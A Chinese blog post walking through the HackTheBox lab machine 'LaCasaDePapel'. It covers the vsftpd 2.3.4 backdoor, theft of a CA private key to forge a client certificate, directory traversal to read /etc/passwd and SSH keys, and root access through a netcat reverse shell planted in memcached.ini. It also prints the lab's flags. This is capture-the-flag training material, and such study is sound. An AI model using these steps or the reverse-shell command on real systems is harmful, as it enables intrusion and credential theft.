hackthebox-Tracks-CREST_CRT-LaCasaDePapel

最新推荐文章于 2023-02-21 21:58:27 发布
最新推荐文章于 2023-02-21 21:58:27 发布
阅读量204 收藏
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/129027083
版权

vsftpd 2.3.4 存在笑脸漏洞

nc连接靶机的21端口,输入user带有:),pass随便输入,注意:这里需要手动输入,此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会随之关闭

6200端口开启

nc连接6200端口

发现tokyo文件

查看文件

show $tokyo

class Tokyo {

private function sign($caCert,$userCsr) {

$caKey = file_get_contents('/home/nairobi/ca.key');

$userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);

openssl_x509_export($userCert, $userCertOut);

return $userCertOut;

}

}

发现证书位置 file_get_contents('/home/nairobi/ca.key');

获取的是私钥

复制下来,删除所有的空格以及\n

访问 https://10.129.218.112

提示需要证书,利用上方获得的私钥

根据私钥生成证书

(参考:https://blog.csdn.net/ljskr/article/details/84570254;https://blog.csdn.net/woaiclh13/article/details/113618984)

1)生成证书请求文件(CSR)

openssl req -new -key ca.key -out server.csr

(

req 产生证书签发申请命令

-key 输入的 key文件

-out 输出文件

)

2)自签署证书(正常的证书是你把上面生成的请求文件(.CSR)发送给可信机构(CA),让可信机构根据你的请求去生成和签署证书,再给你发回来。这里是自己给自己签署。)

# 输入 csr 请求文件,指定签署的 key,输出证书 crt 文件。

openssl x509 -req -days 365 -in server.csr -signkey ca.key -out server.crt

(

x509 签发X.509格式证书命令

-req 证书输入请求

-days 证书有效天数

-in 输入文件,这里是上一步生成的请求文件(.CSR)

-signkey 签名密钥(key)文件

-out 输出文件

)

3)生成 .p12 文件(注:.p12是PKCS#12文件的文件扩展名,也称为“PFX文件”的备用扩展,它是保存私钥和证书的组合格式。)

openssl pkcs12 -export -in server.crt -inkey ca.key -out server.p12

(

-exploit 创建PKCS12文件

-in 输入文件

-inkey 私钥,否则从输入文件中的-读取

-out 输出文件

)

生成了证书后,打开浏览器,在设置,隐私与安全,证书,查看证书下面,您的证书下面,选择导入刚才的证书。

刷新https://10.129.218.112页面

任意点击一个

点击会下载文件

点击下载并抓包

使用 https://gchq.github.io/CyberChef/ magic 解密 U0VBU09OLTEvMDIuYXZp

发现是经过base64编码的路径

测试本地文件读取

路径为 /home/berlin/downloads/

跨越目录

../../../../etc/passwd

尝试 https://lacasadepel.htb/?path=../../../../etc/passwd

https://lacasadepel.htb/?path=../../../../home

发现用户

berlin,dali,nairobi.oslo.professor

https://lacasadepel.htb/?path=../../../../home/berlin

发现 .ssh user.txt文件

https://lacasadepel.htb/?path=../../../../home/berlin/.ssh

下载id_rsa文件

../../../../home/berlin/.ssh/id_rsa

https://lacasadepel.htb/file/Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=

尝试ssh登录

ssh -i id_rsa berlin@10.129.218.112

下载user.txt

../../../../home/berlin/user.txt

https://lacasadepel.htb/file/Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ=

获取用户flag

0d10ef8c50f0fbaeda6088f7631b0449

查看dali用户

https://lacasadepel.htb/?path=../../../../home/dali

https://lacasadepel.htb/?path=../../../../home/dali/.ssh

查看nairobi用户

https://lacasadepel.htb/?path=../../../../home/nairobi

查看oslo用户

https://lacasadepel.htb/?path=../../../../home/oslo

查看professor用户

https://lacasadepel.htb/?path=../../../../home/professor

https://lacasadepel.htb/?path=../../../../home/professor/.ssh

尝试 berlin,dali,nairobi.oslo.professor 五个用户使用 https://lacasadepel.htb/?path=../../../../home/berlin/.ssh 下载的 id_rsa密钥 进行登录

ssh -i id_rsa dali@10.129.218.112

ssh -i id_rsa nairobi@10.129.218.112

ssh -i id_rsa oslo@10.129.218.112

ssh -i id_rsa professor@10.129.218.112

查看文件

对 memcached.ini 和 memcached.js 只有读权限

查看 memcached.ini文件

memcached.ini正在使用sudo执行以下命令:/usr/bin/node/home/professional/memcached.js作为nobody。最有可能的是,它将以root身份运行,我运行pspy并看到命令会定期执行: (pspy64下载链接:https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64)

上传pspy64

本地创建新的 memcached.ini 文件(内含反弹shell马) ,靶机删除原文件并下载构造好的文件

[program:memcached]

command = /usr/bin/nc 10.10.16.3 6655 -e /bin/bash

成功获取到root shell

获取root flag

c7197a870007517d1fb7f1887dabbfba

:)--+
关注
专栏目录
t3_Predicting the Markets w ML_sklearn_scatter_PairGrid_R-squared_log returns_Lasso_ridge_KNN_SVM_LR
Linli522362242的专栏
12-03 5651
In the last chapter, we learned how to design trading strategies, create trading signals, and implement advanced concepts, such as seasonality in trading instruments. Understanding those concepts in greater detail is a vast field comprising stochastic...
【Apollo7.0】感知模块(3):激光雷达感知中的目标跟踪算法--lidar_obstacle_tracking---multi_target_tracker
yangda_9527的博客
04-17 1755
apollo7.0, 激光雷达感知中的目标跟踪算法。
如何为目标识别追踪项目mikel-brostrom/yolov8_tracking增加计数功能?
专注“目标检测”领域技术分享
02-21 4579
代码的网址项目名:Real-time multi-object tracking and segmentation using Yolov8(1)它的识别和分割是YOLO8完成的。它的多目标追踪是由后面四种算法实现的(botsort,bytetrack,ocsort,strongsort)(2)它这个是实时的Real-time,识别、跟踪、分割的速度很快。
ROS Navigation-----costmap_2d简介
倔强不倒翁的博客
11-30 8677
costmap_2d简介
memory-profiler
既然选择了远方 便只顾风雨兼程 - 永强
08-26 2478
memory-profiler https://pypi.org/project/memory-profiler/ A module for monitoring memory usage of a python program. 用于监视 python 程序的内存使用情况的模块。 1. Memory Profiler This is a python module for monitoring ...
Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_
10-03
标题 "Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_" 暗示了这是一个关于3D打印的项目,特别设计用于Magic Tracks,一种可拼接、灵活弯曲的赛车轨道。"3dp"代表3D打印,而"magic 3dpstl"可能是指这个项目...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
react-concurrent-mode-typescript-example::shuffle_tracks_button:在TypeScript中使用React并发模式的示例
05-06
:shuffle_tracks_button: React并发模式TypeScript示例 这是一个带有TypeScript的项目示例。 此外,它启用了实验并发模式和暂挂功能,并包括适当的实验类型。 目的是您可以探索和试验新的实验性功能,但可以使用...
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
react-movable::shuffle_tracks_button:拖放您的React列表和表格。 无障碍。 小
02-05
React移动 ! 安装 yarn add react-movable 用法 import * as React from 'react' ; import { List , arrayMove } from 'react-movable' ; const SuperSimple : React .... const [ items , setItems ] = React ....
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
weixin021基于JAVA微信点餐小程序设计+ssm.rar
最新发布
09-13
所有源码,都是可以运行起来的
基于深度神经网络的模型预测控制器(mpc-DL-controller).zip
09-13
该项目旨在开发一种基于深度神经网络(DNN)的预测最优控制器,用于对受干扰的系统(包括HVAC、太阳能电池和电池)进行控制。传统的模型预测控制(MPC)虽然广泛应用于化工、炼油厂和电力系统等行业,但在处理大量数据和实现快速实时控制方面面临挑战。利用深度神经网络的优势,本研究模拟了一种线下最优控制方案,通过对HVAC系统与电网、电池和太阳能电池板的连接进行模拟,训练一个深度神经网络(包含六层,每层五十个单元),以实现无需显式控制计算或指令的MPC控制。该项目的实施展示了深度学习和模型预测控制相结合在复杂系统中的潜力。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看READMe.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
Serial ATA revistion3.2 protocal SATA 3.2 协议 protocal
09-13
Serial ATA revistion3.2 protocal SATA 3.2 协议 protocal
基于java的装饰工程管理系统设计与实现.docx
09-13
基于java的装饰工程管理系统设计与实现.docx
基于java的小区物业智能卡管理的设计与实现.docx
09-13
基于java的小区物业智能卡管理的设计与实现.docx
UG 菜单工具条文件格式
09-13
UG 外挂开发时,使用的工具栏,菜单文件格式。
基于java的大型商场应急预案管理系统设计与实现.docx
09-13
基于java的大型商场应急预案管理系统设计与实现.docx
labview源码DAQ数据采集程序labview源码DAQ数据采集程序
09-13
labview,labview源码DAQ数据采集程序labview源码DAQ数据采集程序
通过echarts根据hangzhou-tracks.json绘制地图
05-14
首先,需要下载并引入echarts库,可以在官网下载或者通过CDN引入。然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>ECharts - Hangzhou Map</title> <!-- 引入echarts库 --> <script src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script> </head> <body> <!-- 定义一个画布 --> <div id="map" style="width: 800px;height: 600px;"></div> <script> // 初始化echarts实例 var myChart = echarts.init(document.getElementById('map')); // 加载数据 myChart.showLoading(); $.getJSON('hangzhou-tracks.json', function (data) { myChart.hideLoading(); // 绘制地图 echarts.registerMap('hangzhou', data); myChart.setOption({ series: [{ type: 'map', map: 'hangzhou' }] }); }); </script> </body> </html> ``` 其中,`echarts.init`用来初始化一个echarts实例,`echarts.registerMap`用来注册地图数据,`myChart.setOption`用来设置地图的参数。具体的参数可以在echarts官网上查看文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值